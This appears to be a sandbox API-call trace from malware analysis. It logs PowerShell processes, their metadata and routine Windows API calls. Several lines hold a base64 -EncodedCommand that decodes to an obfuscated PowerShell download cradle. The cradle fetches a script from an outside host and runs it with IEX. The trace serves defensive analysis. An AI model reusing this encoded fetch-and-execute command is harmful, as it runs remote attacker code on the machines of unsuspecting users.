	[0537.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c80dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0537.537] SetErrorMode (uMode=0x1) returned 0x1
	[0537.537] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c80e1d0 | out: lpFileInformation=0x1c80e1d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0537.537] SetErrorMode (uMode=0x1) returned 0x1
	[0537.538] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0537.538] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0537.538] CoTaskMemFree (pv=0x434820) 
	[0537.539] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0537.539] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0537.540] CoTaskMemFree (pv=0x434820) 
	[0537.543] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0537.543] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0537.543] CoTaskMemFree (pv=0x434820) 
	[0537.552] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0537.552] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0537.552] CoTaskMemFree (pv=0x434820) 
	[0539.187] CoTaskMemAlloc (cb=0x3b) returned 0x455ea0
	[0539.187] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c80e3b8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c80e3b8) returned 0x4550
	[0539.188] CoTaskMemFree (pv=0x455ea0) 
	[0539.191] GetConsoleWindow () returned 0x104bc
	[0539.198] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0539.198] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0539.198] CoTaskMemFree (pv=0x434820) 
	[0539.199] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0539.199] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0539.199] CoTaskMemFree (pv=0x434820) 
	[0539.205] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0539.205] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0539.205] CoTaskMemFree (pv=0x434820) 
	[0539.207] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c80e400 | out: pNumArgs=0x1c80e400) returned 0x1b83f790*=""
	[0539.208] lstrlenW (lpString="-EncodedCommand") returned 15
	[0539.209] CoTaskMemAlloc (cb=0x22) returned 0x1b851290
	[0539.209] RtlMoveMemory (in: Destination=0x1b851290, Source=0x1b83f7b2, Length=0x20 | out: Destination=0x1b851290) 
	[0539.209] CoTaskMemFree (pv=0x1b851290) 
	[0539.209] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0539.209] CoTaskMemAlloc (cb=0x2f4) returned 0x3dcfb0
	[0539.209] RtlMoveMemory (in: Destination=0x3dcfb0, Source=0x1b83f7d2, Length=0x2f2 | out: Destination=0x3dcfb0) 
	[0539.209] CoTaskMemFree (pv=0x3dcfb0) 
	[0539.210] LocalFree (hMem=0x1b83f790) returned 0x0
	[0539.211] CoTaskMemAlloc (cb=0x804) returned 0x3dcfb0
	[0539.211] GetConsoleTitleW (in: lpConsoleTitle=0x3dcfb0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0540.280] CoTaskMemFree (pv=0x3dcfb0) 
	[0540.288] CoTaskMemAlloc (cb=0x38e) returned 0x1b83f790
	[0540.288] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c80e360*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2f616f8 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2f616f8*(hProcess=0x3a0, hThread=0x354, dwProcessId=0x1bd4, dwThreadId=0x1bd8)) returned 1
	[0540.602] CoTaskMemFree (pv=0x1b83f790) 
	[0540.603] CloseHandle (hObject=0x354) returned 1
	[0540.603] CoTaskMemAlloc (cb=0x3b) returned 0x455ea0
	[0540.603] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c80e408, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c80e408) returned 0x4550
	[0540.604] CoTaskMemFree (pv=0x455ea0) 
	[0540.607] GetCurrentProcess () returned 0xffffffffffffffff
	[0540.607] GetCurrentProcess () returned 0xffffffffffffffff
	[0540.608] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3a0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c80e4e8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c80e4e8*=0x354) returned 1

Process:
	id = "86"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x6e63b000"
	os_pid = "0x308"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "22"
	os_parent_pid = "0x4fc"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 381
	os_tid = 0x56c


Thread:
	id = 452
	os_tid = 0x1100


Thread:
	id = 459
	os_tid = 0x1124


Thread:
	id = 1783
	os_tid = 0x1f54


Thread:
	id = 1785
	os_tid = 0x1d54


Thread:
	id = 1810
	os_tid = 0x20d0


Thread:
	id = 1934
	os_tid = 0x261c


Process:
	id = "87"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x6b7ce000"
	os_pid = "0x9b8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "18"
	os_parent_pid = "0x618"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 384
	os_tid = 0xad4

	[0559.845] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0565.656] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0565.656] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0565.656] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0565.656] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0582.816] GetVersionExW (in: lpVersionInformation=0x1cdfe0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cdfe0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0582.818] GetVersionExW (in: lpVersionInformation=0x1cdfe0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cdfe0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0582.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0582.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0582.832] GetVersionExW (in: lpVersionInformation=0x1cdd50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cdd50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0582.833] SetErrorMode (uMode=0x1) returned 0x1
	[0582.834] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1cdeb0 | out: lpFileInformation=0x1cdeb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0582.835] SetErrorMode (uMode=0x1) returned 0x1
	[0582.838] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1ce120 | out: lpdwHandle=0x1ce120) returned 0x94c
	[0582.840] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cd72a0 | out: lpData=0x2cd72a0) returned 1
	[0582.842] VerQueryValueW (in: pBlock=0x2cd72a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ce098, puLen=0x1ce090 | out: lplpBuffer=0x1ce098*=0x2cd733c, puLen=0x1ce090) returned 1
	[0582.845] lstrlenW (lpString="䅁") returned 1
	[0584.431] VerQueryValueW (in: pBlock=0x2cd72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1ce008, puLen=0x1ce000 | out: lplpBuffer=0x1ce008*=0x2cd7418, puLen=0x1ce000) returned 1
	[0584.432] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0584.434] CoTaskMemAlloc (cb=0x2e) returned 0x3d2a40
	[0584.434] lstrcpyW (in: lpString1=0x3d2a40, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0584.435] CoTaskMemFree (pv=0x3d2a40) 
	[0584.435] VerQueryValueW (in: pBlock=0x2cd72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1ce008, puLen=0x1ce000 | out: lplpBuffer=0x1ce008*=0x2cd746c, puLen=0x1ce000) returned 1
	[0584.435] lstrlenW (lpString="System.Management.Automation") returned 28
	[0584.435] CoTaskMemAlloc (cb=0x3c) returned 0x309e80
	[0584.436] lstrcpyW (in: lpString1=0x309e80, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0584.436] CoTaskMemFree (pv=0x309e80) 
	[0584.436] VerQueryValueW (in: pBlock=0x2cd72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1ce008, puLen=0x1ce000 | out: lplpBuffer=0x1ce008*=0x2cd74c8, puLen=0x1ce000) returned 1
	[0584.436] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0584.436] CoTaskMemAlloc (cb=0x20) returned 0x3d3010
	[0584.436] lstrcpyW (in: lpString1=0x3d3010, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0584.436] CoTaskMemFree (pv=0x3d3010) 
	[0584.436] VerQueryValueW (in: pBlock=0x2cd72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1ce008, puLen=0x1ce000 | out: lplpBuffer=0x1ce008*=0x2cd7508, puLen=0x1ce000) returned 1
	[0584.436] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0584.436] CoTaskMemAlloc (cb=0x44) returned 0x309e80
	[0584.436] lstrcpyW (in: lpString1=0x309e80, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0584.436] CoTaskMemFree (pv=0x309e80) 
	[0584.436] VerQueryValueW (in: pBlock=0x2cd72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1ce008, puLen=0x1ce000 | out: lplpBuffer=0x1ce008*=0x2cd7570, puLen=0x1ce000) returned 1
	[0584.436] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0584.436] CoTaskMemAlloc (cb=0x76) returned 0x36d780
	[0584.436] lstrcpyW (in: lpString1=0x36d780, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0584.436] CoTaskMemFree (pv=0x36d780) 
	[0584.436] VerQueryValueW (in: pBlock=0x2cd72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1ce008, puLen=0x1ce000 | out: lplpBuffer=0x1ce008*=0x2cd760c, puLen=0x1ce000) returned 1
	[0584.437] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0584.437] CoTaskMemAlloc (cb=0x44) returned 0x309e80
	[0584.437] lstrcpyW (in: lpString1=0x309e80, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0584.437] CoTaskMemFree (pv=0x309e80) 
	[0584.437] VerQueryValueW (in: pBlock=0x2cd72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1ce008, puLen=0x1ce000 | out: lplpBuffer=0x1ce008*=0x2cd7670, puLen=0x1ce000) returned 1
	[0584.437] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0584.437] CoTaskMemAlloc (cb=0x58) returned 0x325860
	[0584.437] lstrcpyW (in: lpString1=0x325860, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0584.437] CoTaskMemFree (pv=0x325860) 
	[0584.437] VerQueryValueW (in: pBlock=0x2cd72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1ce008, puLen=0x1ce000 | out: lplpBuffer=0x1ce008*=0x2cd76ec, puLen=0x1ce000) returned 1
	[0584.437] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0584.437] CoTaskMemAlloc (cb=0x20) returned 0x3d3010
	[0584.437] lstrcpyW (in: lpString1=0x3d3010, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0584.437] CoTaskMemFree (pv=0x3d3010) 
	[0584.437] VerQueryValueW (in: pBlock=0x2cd72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1ce008, puLen=0x1ce000 | out: lplpBuffer=0x1ce008*=0x2cd7394, puLen=0x1ce000) returned 1
	[0584.437] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0584.437] CoTaskMemAlloc (cb=0x66) returned 0x34c530
	[0584.437] lstrcpyW (in: lpString1=0x34c530, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0584.438] CoTaskMemFree (pv=0x34c530) 
	[0584.438] VerQueryValueW (in: pBlock=0x2cd72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1ce008, puLen=0x1ce000 | out: lplpBuffer=0x1ce008*=0x0, puLen=0x1ce000) returned 0
	[0584.438] VerQueryValueW (in: pBlock=0x2cd72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1ce008, puLen=0x1ce000 | out: lplpBuffer=0x1ce008*=0x0, puLen=0x1ce000) returned 0
	[0584.438] VerQueryValueW (in: pBlock=0x2cd72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1ce008, puLen=0x1ce000 | out: lplpBuffer=0x1ce008*=0x0, puLen=0x1ce000) returned 0
	[0584.438] VerQueryValueW (in: pBlock=0x2cd72a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cdfd8, puLen=0x1cdfd0 | out: lplpBuffer=0x1cdfd8*=0x2cd733c, puLen=0x1cdfd0) returned 1
	[0584.439] CoTaskMemAlloc (cb=0x204) returned 0x371f60
	[0584.439] VerLanguageNameW (in: wLang=0x0, szLang=0x371f60, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0584.440] CoTaskMemFree (pv=0x371f60) 
	[0584.441] VerQueryValueW (in: pBlock=0x2cd72a0, lpSubBlock="\\", lplpBuffer=0x1ce028, puLen=0x1ce020 | out: lplpBuffer=0x1ce028*=0x2cd72c8, puLen=0x1ce020) returned 1
	[0584.447] GetCurrentProcessId () returned 0x9b8
	[0586.005] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1ccf50 | out: lpLuid=0x1ccf50*(LowPart=0x14, HighPart=0)) returned 1
	[0586.008] GetCurrentProcess () returned 0xffffffffffffffff
	[0586.008] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x1ccf70 | out: TokenHandle=0x1ccf70*=0x1d4) returned 1
	[0586.009] AdjustTokenPrivileges (in: TokenHandle=0x1d4, DisableAllPrivileges=0, NewState=0x2cdab18*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0586.011] CloseHandle (hObject=0x1d4) returned 1
	[0586.015] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b8) returned 0x1d4
	[0586.032] EnumProcessModules (in: hProcess=0x1d4, lphModule=0x2cdab80, cb=0x200, lpcbNeeded=0x1cdf88 | out: lphModule=0x2cdab80, lpcbNeeded=0x1cdf88) returned 1
	[0586.091] GetModuleInformation (in: hProcess=0x1d4, hModule=0x13f370000, lpmodinfo=0x2cdadf0, cb=0x18 | out: lpmodinfo=0x2cdadf0*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0586.092] CoTaskMemAlloc (cb=0x804) returned 0x3dad80
	[0586.092] GetModuleBaseNameW (in: hProcess=0x1d4, hModule=0x13f370000, lpBaseName=0x3dad80, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0586.092] CoTaskMemFree (pv=0x3dad80) 
	[0586.093] CoTaskMemAlloc (cb=0x804) returned 0x3dad80
	[0586.093] GetModuleFileNameExW (in: hProcess=0x1d4, hModule=0x13f370000, lpFilename=0x3dad80, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0586.093] CoTaskMemFree (pv=0x3dad80) 
	[0586.094] CloseHandle (hObject=0x1d4) returned 1
	[0586.102] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x9b8) returned 0x1d4
	[0586.103] GetExitCodeProcess (in: hProcess=0x1d4, lpExitCode=0x1ce0b8 | out: lpExitCode=0x1ce0b8*=0x103) returned 1
	[0587.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12cdb088, Length=0x20000, ResultLength=0x1ce080 | out: SystemInformation=0x12cdb088, ResultLength=0x1ce080*=0x35488) returned 0xc0000004
	[0587.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12cfb0b8, Length=0x37c88, ResultLength=0x1ce080 | out: SystemInformation=0x12cfb0b8, ResultLength=0x1ce080*=0x35488) returned 0x0
	[0587.735] EnumWindows (lpEnumFunc=0x2a966ac, lParam=0x0) returned 1
	[0596.417] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
	[0596.548] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x558
	[0597.676] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
	[0600.675] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
	[0601.229] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
